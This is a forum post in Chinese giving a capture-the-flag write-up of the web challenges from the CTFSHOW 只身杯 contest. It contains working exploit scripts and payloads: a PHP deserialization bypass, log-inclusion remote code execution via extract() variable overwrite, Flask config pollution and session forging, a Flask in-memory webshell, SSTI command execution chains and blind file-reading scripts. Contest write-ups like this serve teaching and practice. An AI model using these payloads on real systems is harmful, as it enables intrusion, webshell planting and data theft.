CTFSHOW-只身杯(WEB部分复现WP)

打印 上一主题 下一主题

主题 968|帖子 968|积分 2904

前言

昨天刚竣事的CTFSHOW只身杯,遗憾没有时间打,只能做个赛后复盘了。我主攻WEB方向,以是对WEB方向的题目进行一次复现,其他方向有兴趣相识的朋侪可以参考官方WP,链接我会放在参考部分。
1. 签到·好玩的PHP

打开环境,访问地点即可看到题目源码
  1. <?php
  2.     error_reporting(0);
  3.     highlight_file(__FILE__);
  4.     class ctfshow {
  5.         private $d = '';
  6.         private $s = '';
  7.         private $b = '';
  8.         private $ctf = '';
  9.         public function __destruct() {
  10.             $this->d = (string)$this->d;
  11.             $this->s = (string)$this->s;
  12.             $this->b = (string)$this->b;
  13.             if (($this->d != $this->s) && ($this->d != $this->b) && ($this->s != $this->b)) {
  14.                 $dsb = $this->d.$this->s.$this->b;
  15.                 if ((strlen($dsb) <= 3) && (strlen($this->ctf) <= 3)) {
  16.                     if (($dsb !== $this->ctf) && ($this->ctf !== $dsb)) {
  17.                         if (md5($dsb) === md5($this->ctf)) {
  18.                             echo file_get_contents("/flag.txt");
  19.                         }
  20.                     }
  21.                 }
  22.             }
  23.         }
  24.     }
  25.     unserialize($_GET["dsbctf"]);
复制代码
1.1 代码逻辑



  • 变量$dsb由$d,$s,$b三个变量拼接而成,要求这三个变量的值两两不等,拼接得到的字符串长度不凌驾3。
  • 变量$ctf长度不凌驾3。
  • 如果$ctf和$dsb不强等于,而MD5值相称,那么包罗"/flag.txt"。
  • 传入参数dsbctf是序列化后的字符串,通过unserialize函数反序列化后调用__destruct方法实例化ctfshow类,触发发序列化毛病

强等于"==="需要变量类型和变量值都相称,一个思路使用PHP中的特殊浮点常量NAN和INF。
1.2 什么是NAN和INF?

在PHP中,NAN是一个特殊的浮点数值,表示非数值(Not-A-Number)。当一个运算无法计算效果时,好比零除以零,就会产生NAN。
PHP中的INF是一个特殊的浮点数值,表示无穷大(Infinity)。当数值凌驾PHP_FLOAT_MAX大概使用一些数学函数产生极大或极小的效果时,就会得到INF。
 


1.3 利用思路

1.3.1 php浮点数常量NAN和INF

使用浮点常量INF分别给ctf和dsb变量赋值,长度都为3,dsb是字符串类型,ctf是浮点型,由于MD5是以字符串形式进行加密的,以是他们的MD5值是相称的。如许就到达了绕过的目标。
payload:
  1. <?php
  2. class ctfshow {
  3.     private $d = 'I';
  4.     private $s = 'N';
  5.     private $b = 'F';
  6.     private $ctf = INF;
  7. }
  8. $a=new ctfshow();
  9. echo urlencode(serialize($a));
  10. //O%3A7%3A%22ctfshow%22%3A4%3A%7Bs%3A10%3A%22%00ctfshow%00d%22%3Bs%3A1%3A%22I%22%3Bs%3A10%3A%22%00ctfshow%00s%22%3Bs%3A1%3A%22N%22%3Bs%3A10%3A%22%00ctfshow%00b%22%3Bs%3A1%3A%22F%22%3Bs%3A12%3A%22%00ctfshow%00ctf%22%3Bd%3AINF%3B%7D
复制代码
 


2.  迷雾重重

下载题目源码,放到IDEA进行代码审计
看到IndexController.php
  1. <?php
  2. namespace app\controller;
  3. use support\Request;
  4. use support\exception\BusinessException;
  5. class IndexController
  6. {
  7.     public function index(Request $request)
  8.     {
  9.         
  10.         return view('index/index');
  11.     }
  12.     public function testUnserialize(Request $request){
  13.         if(null !== $request->get('data')){
  14.             $data = $request->get('data');
  15.             unserialize($data);
  16.         }
  17.         return "unserialize测试完毕";
  18.     }
  19.     public function testJson(Request $request){
  20.         if(null !== $request->get('data')){
  21.             $data = json_decode($request->get('data'),true);
  22.             if(null!== $data && $data['name'] == 'guest'){
  23.                 return view('index/view', $data);
  24.             }
  25.         }
  26.         return "json_decode测试完毕";
  27.     }
  28.     public function testSession(Request $request){
  29.         $session = $request->session();
  30.         $session->set('username',"guest");
  31.         $data = $session->get('username');
  32.         return "session测试完毕 username: ".$data;
  33.     }
  34.     public function testException(Request $request){
  35.         if(null != $request->get('data')){
  36.             $data = $request->get('data');
  37.             throw new BusinessException("业务异常 ".$data,3000);
  38.         }
  39.         return "exception测试完毕";
  40.     }
  41. }
复制代码
有四个接口testUnserialize、testJson、testSession、testException
2.1 代码分析

 testUnserialize接口没有发现存在触发反序列化毛病的可实例化类
testJson担当json格式数据,如果'name'的值等于'guest'的话就调用view方法,传入的参数为一个字符串'index/view'和我们传入的json格式数据$data,进行跟进

调用到 render方法,详细实现如下
  1.    public static function render(string $template, array $vars, string $app = null, string $plugin = null): string
  2.     {
  3.         $request = request();
  4.         $plugin = $plugin === null ? ($request->plugin ?? '') : $plugin;
  5.         $configPrefix = $plugin ? "plugin.$plugin." : '';
  6.         $viewSuffix = config("{$configPrefix}view.options.view_suffix", 'html');
  7.         $app = $app === null ? ($request->app ?? '') : $app;
  8.         $baseViewPath = $plugin ? base_path() . "/plugin/$plugin/app" : app_path();
  9.         $__template_path__ = $app === '' ? "$baseViewPath/view/$template.$viewSuffix" : "$baseViewPath/$app/view/$template.$viewSuffix";
  10.         if(isset($request->_view_vars)) {
  11.             extract((array)$request->_view_vars);
  12.         }
  13.         extract($vars);
  14.         ob_start();
  15.         // Try to include php file.
  16.         try {
  17.             include $__template_path__;
  18.         } catch (Throwable $e) {
  19.             ob_end_clean();
  20.             throw $e;
  21.         }
  22.         return ob_get_clean();
  23.     }
  24. }
复制代码
传入的参数$var可控,利用extract()函数可以实现变量覆盖,下面还有一个文件包罗毛病。
2.2 利用思路

要利用文件包罗毛病需要找到可被包罗的文件


  • nginx apache 不存在,排除日志包罗的思路
  • pearcmd 由于下令行启动 这里不能使用php-fpm的方式 包罗pearcmd.php来getshell
  • session 文件包罗 需要找到网站部署的目录名字 进行绝对路径包罗 相对路径无法定位到session文件
  • 文件上传未开启 无法包罗临时文件 和 文件上传 session
  • 远程文件包罗 测试发现除了file协议 其他伪协议并未开启
一个思路是包罗php代码。include的包罗方式是先检查一遍所要包罗的文件是否存在,如果存在则包罗,不存在则报错。如果包罗的是php代码,include会先执行一遍php代码,再将未经url编码的报错信息写入日志文件。我们可以包罗执行下令的php代码,如'<? `cat /flag>flag.txt`;?>',将下令执行效果输出到可访问的文件目录下,如public目录,但是重定向输出执行效果到指定文件需要public目录的绝对路径。获取绝对路径的思路是利用/proc/进程PID/cmdline找到存在start.php的下令,因为cmdline包罗了运行start.php时文件的绝对路径。
/proc/pid目录介绍:

官方payload:
  1. import requests
  2. import time
  3. from datetime import datetime
  4. #注意 这里题目地址 应该https换成http
  5. url = "http://6d2d54ba-5db3-454c-b8b4-869e514c1376.challenge.ctf.show/"
  6. #Author: ctfshow h1xa
  7. def get_webroot():
  8.     print("[+] Getting webroot...")
  9.    
  10.     webroot = ""
  11.     for i in range(1,300):
  12.         r = requests.get(url=url+'index/testJson?data={{"name": "guest", "__template_path__": "/proc/{}/cmdline"}}'.format(i))   
  13.         time.sleep(0.2)
  14.         if "start.php" in r.text:
  15.             print(f"[\033[31m*\033[0m] Found start.php at /proc/{i}/cmdline")
  16.             webroot = r.text.split("start_file=")[1][:-10]
  17.             print(f"Found webroot: {webroot}")
  18.             break
  19.     return webroot
  20. def send_shell(webroot):
  21.     #payload = 'index/testJson?data={{"name":"guest","__template_path__":"<?php%20`ls%20/>{}/public/ls.txt`;?>"}}'.format(webroot)
  22.     payload = 'index/testJson?data={{"name":"guest","__template_path__":"<?php%20`cat%20/s00*>{}/public/flag.txt`;?>"}}'.format(webroot)
  23.     r = requests.get(url=url+payload)
  24.     time.sleep(1)
  25.     if r.status_code == 500:
  26.         print("[\033[31m*\033[0m] Shell sent successfully")
  27.     else:
  28.         print("Failed to send shell")
  29. def include_shell(webroot):
  30.     now = datetime.now()
  31.     payload = 'index/testJson?data={{"name":"guest","__template_path__":"{}/runtime/logs/webman-{}-{}-{}.log"}}'.format(webroot, now.strftime("%Y"), now.strftime("%m"), now.strftime("%d"))
  32.     r = requests.get(url=url+payload)
  33.     time.sleep(5)
  34.     r = requests.get(url=url+'flag.txt')
  35.     if "ctfshow" in r.text:
  36.         print("=================FLAG==================\n")
  37.         print("\033[32m"+r.text+"\033[0m")
  38.         print("=================FLAG==================\n")
  39.         print("[\033[31m*\033[0m] Shell included successfully")
  40.     else:
  41.         print("Failed to include shell")
  42. def exploit():
  43.     webroot = get_webroot()
  44.     send_shell(webroot)
  45.     include_shell(webroot)
  46. if __name__ == '__main__':
  47.     exploit()
复制代码
 


3.  ez_inject

3.1 题目分析

 打开题目链接

有一个输入框,一个注册和一个登录

先随便注册一个用户test/test,登录之后看到Secret提示

看一下数据包


很显着是jwt伪造,那么jwt密钥是什么呢?

根据提示可以利用原型连污染区覆盖掉全局变量中的SECRET_KEY的值,接口是/register
  1. import requests
  2. import json
  3. url = "https://37dd227b-d7c6-48e4-a462-435c08715f44.challenge.ctf.show/register"
  4. payload = {
  5.     "username": "test",
  6.     "password": "test",
  7.     "__init__": {"__globals__": {"app": {"config": {"SECRET_KEY": "baozongwi"}}}},
  8. }
  9. r = requests.post(url=url, json=payload)
  10. print(r.text)
复制代码

接下来用test1用户登录, 再用flask-unsign伪造一个jwt
  1. flask-unsign --sign --cookie "{'is_admin': 1, 'username': 'test1'}" --secret  'baozongwi'
  2. eyJpc19hZG1pbiI6MSwidXNlcm5hbWUiOiJ0ZXN0MSJ9.ZzYYAg.hqQmeTq4GCo4yfAofb0pngi0tpA
复制代码
 修改cookie后重新发包

提示接口是/echo, 
 


着实就是一开始的输入框

3.2 利用思路

3.2.1 url_for内存马

flask可以用url_for打内存马,一个测试demo
  1. from flask import Flask, request, render_template_string
  2. app = Flask(__name__)
  3. @app.route('/')
  4. def hello_world():  # put application's code here
  5.     person = 'knave'
  6.     if request.args.get('name'):
  7.         person = request.args.get('name')
  8.     template = '<h1>Hi, %s.</h1>' % person
  9.     return render_template_string(template)
  10. if __name__ == '__main__':
  11.     app.run()
复制代码
测试payload:
  1. http://127.0.0.1:5000/?name={{url_for.__globals__['__builtins__']['eval']("__import__('os').system('calc')")}}
复制代码

本题环境不需要使用“{{}}”
  1. url_for["\137\137\147\154\157\142\141\154\163\137\137"]  ["\137\137\142\165\151\154\164\151\156\163\137\137"]['eval']  ("app.after_request_funcs.setdefault(None, []).append(lambda resp: CmdResp if  request.args.get('cmd') and exec("global  CmdResp;CmdResp=__import__(\'flask\').make_response(__import__(\'os\').popen(requ  est.args.get(\'cmd\')).read())")==None else resp)",  {'request':url_for["\137\137\147\154\157\142\141\154\163\137\137"]  ['request'],'app':url_for["\137\137\147\154\157\142\141\154\163\137\137"]  ['current_app']})
  2. //url_for.__globals__['__builtins__']['eval']("app.add_url_rule('/shell', 'shell', lambda :__import__('os').popen(_request_ctx_stack.top.request.args.get('cmd','whoami')).read())",{'_request_ctx_stack':url_for.__globals__['_request_ctx_stack'],'app':url_for.__globals__['current_app']})
复制代码
 

设置了waf 
3.2.2 cycler盲注

官方wp用到的是cycler进行盲注:
什么是cycler?
Cycler 是一个用于创建可组合样式循环的 Python 库。它主要用于数据可视化库(如 Matplotlib)中,以简化样式管理。Cycler 答应用户界说一组样式,并在绘图时循环使用这些样式,从而使图表更加雅观和同等。
检测payload:
  1. cycler["__in"+"it__"]["__glo"+"bals__"]  ["__bui"+"ltins__"].__import__('builtins').open('/flag').read(1)[0]=='c'
复制代码

 官方payload:
  1. import requests
  2. import concurrent.futures
  3. url = "http://7d26c775-19b5-4001-88e3-fbba32c4e64c.challenge.ctf.show/echo"
  4. strings = "qwertyuiopasdfghjklzxcvbnm{}-12334567890"
  5. target = ""
  6. headers = {
  7.     "Content-Type": "application/x-www-form-urlencoded",
  8.     "cookie":"user=eyJpc19hZG1pbiI6MSwidXNlcm5hbWUiOiJ0ZXN0In0.ZzC9AQ.hbEoNTSwLImc98ykp0j_EJ_VlnQ"
  9. }
  10. def check_character(i, j, string):
  11.     payload = '''
  12.     cycler["__in"+"it__"]["__glo"+"bals__"]
  13.     ["__bui"+"ltins__"].__import__('builtins').open('/flag').read({})[{}]=='{}'
  14.     '''.format(j + 1, j, string)
  15.     data = {"message": payload}
  16.     r = requests.post(url=url, data=data, headers=headers)
  17.     return string if r.status_code == 200 and "your answer is True" in r.text else None
  18. with concurrent.futures.ThreadPoolExecutor(max_workers=10) as executor:
  19.     for i in range(50):
  20.         futures = []
  21.         for j in range(50):
  22.             for string in strings:
  23.                 futures.append(executor.submit(check_character, i, j, string))
  24.         for future in concurrent.futures.as_completed(futures):
  25.             result = future.result()
  26.             if result:
  27.                 print(result)
  28.                 target += result
  29.                 if result == "}":
  30.                     print(target)
  31.                     exit()
复制代码

4. ezzz_ssti

4.1 毛病检测



4.2 利用思路

4.2.1 常规payload

url_for:此函数全局空间下存在 eval() 和 os 模块
lipsum:此函数全局空间下存在 eval() 和 os 模块
以是我们可以使用 __globals__ 属性来获取函数当前全局空间下的全部模块、函数及属性
下列 Payload 即通过 __globals__ 属性获取全局空间中的 os 模块,并调用 popen() 函数来执行系统下令;因为 popen 函数返回的效果是个文件对象,因此需要调用 read() 函数来获取执行效果。
 
payload:
  1. {{url_for.__globals__.os.popen('whoami').read()}}
  2. {{lipsum.__globals__.os.popen('whoami').read()}}
复制代码
有长度限定


 长度检测脚本
  1. import os
  2. import requests
  3. import time
  4. url='http://83ddceb9-5ff3-4177-b538-4b5a5ef813e8.challenge.ctf.show/?user='
  5. s='s'
  6. headers={
  7.     'User-Agent' : 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0',
  8.     'Accept' : 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
  9.     }
  10. for i in range(100):
  11.     payload='s'*i
  12.     res=requests.get(url=url+payload,headers=headers)
  13.     print(i)
  14.     if res.status_code==200 and "太长了bro" in res.text:
  15.         print(len)
  16.         print("url={}".format(url)+"\n"+"最大长度:{}".format(len(payload)-1))
  17.         break
复制代码


4.2.2 set+update方法绕过长度限定

最大长度40,可以使用jinja2中的set+update方法来分段保存payload,使用方法如下
  1. {%set x=config.update(a=config.update)%}   //此时字典中a的值被更新为config全局对象中的update方法
  2. {%set x=config.a(f=lipsum.__globals__)%}   //f的值被更新为lipsum.__globals__
  3. {%set x=config.a(o=config.f.os)%}          //o的值被更新为lipsum.__globals__.os
  4. {%set x=config.a(p=config.o.popen)%}       //p的值被更新为lipsum.__globals__.os.popen
  5. {{config.p("cat /f*").read()}}     
  6. {%print(config)%}                          //输出config字典的所有键值对
  7. {%print(config.o)%}                        //输出
复制代码
 利用脚本:
  1. import os
  2. import requests
  3. import time
  4. url='http://83ddceb9-5ff3-4177-b538-4b5a5ef813e8.challenge.ctf.show/?user='
  5. headers={
  6.     'User-Agent' : 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0',
  7.     'Accept' : 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
  8.     }
  9. # {%set x=config.update(a=config.update)%}   //此时字典中a的值被更新为config全局对象中的update方法
  10. # {%set x=config.a(f=lipsum.__globals__)%}   //f的值被更新为lipsum.__globals__
  11. # {%set x=config.a(o=config.f.os)%}          //o的值被更新为lipsum.__globals__.os
  12. # {%set x=config.a(p=config.o.popen)%}       //p的值被更新为lipsum.__globals__.os.popen
  13. # {{config.p("cat /f*").read()}}
  14. #
  15. #
  16. # {%print(config)%}                          //输出config字典的所有键值对
  17. # {%print(config.o)%}                        //输出   
  18. payload={'{%set x=config.update(a=config.update)%}','{%set x=config.a(f=lipsum.__globals__)%}','{%set x=config.a(o=config.f.os)%}','{%set x=config.a(p=config.o.popen)%}','{{config.p("cat /f*").read()}}'}
  19. print(len(payload))
  20. for s in payload:
  21.     res=requests.get(url=url+s,headers=headers)
  22.     try:
  23.         if res.status_code==200 and "ctfshow" in res.text:
  24.             print(res.text)
  25.             break
  26.         time.sleep(1)
  27.     except:
  28.         print("Erro: "+"\n"+res.text)
  29. #check
  30. # req=requests.get(url+"{%print(config.o)%}",headers=headers)
  31. # if req.status_code==200:
  32. #     print(req.text+"\n"+len(req.text))
复制代码


5. 简朴的文件上传

5.1 毛病检测


随便上传一个jar文件
 

文件巨细有限定
上传一个小一点的

下方输入文件名然后Execute,发现有执行回显


上传Runtime的getshell包,发现没有执行权限


如许的报错是因为java -jar 下令前面加了 -Djava.securityManager 参数,policy文件内容未知,jvm对 uploads 目录有读权限,同时有loadLibrary.*权限
测试发现题目并未对上传的文件内容做检测

5.2 利用思路

写一个包罗eval方法的本地so格式的libary,通过修改文件后缀进行上传,写一个外部的jar包,通过加载so文件并调用so文件中的eval方法进行下令执行
5.2.1 创建本地so文件

so文件:
https://ctfshow-1257200238.cos.ap-shanghai.myqcloud.com/static/file/dsbctf/CTFshowCodeManager.jar
当然也可以自己写,方法也不一定是eval,更多的内容留给各位自行去探索啦! 
5.2.1 外部jar包调用本地so文件

IDEA自己构建一个jar包来加载并利用调用so文件中的eval方法。构建的时候注意jdk版本不要太高,否则可能会执行失败,我用的jdk是1.8

 


 



在项目标out目录下找到jar包并上传执行



6. 参考

官方wp:https://ctf-show.feishu.cn/docx/R6udd58bxoQGQMxFphncZq8rn5e
深度分析Linux进程的内部机制:一探/proc/pid的奥秘_mountinfo 解析-CSDN博客
Cycler 开源项目教程-CSDN博客
python内存马学习_flask内存马-CSDN博客
Flask框架中的页面跳转和重定向(url_for,redirect)_flask redirect-CSDN博客
利用pearcmd.php文件包罗拿shell(LFI)_pearcmd文件包罗-CSDN博客
Python Flask SSTI 之 长度限定绕过_python绕过长度限定的内置函数-CSDN博客


结语

好久没打CTF了...加油吧!

免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。
回复

使用道具 举报

0 个回复

倒序浏览

快速回复

您需要登录后才可以回帖 登录 or 立即注册

本版积分规则

笑看天下无敌手

金牌会员
这个人很懒什么都没写!

标签云

快速回复 返回顶部 返回列表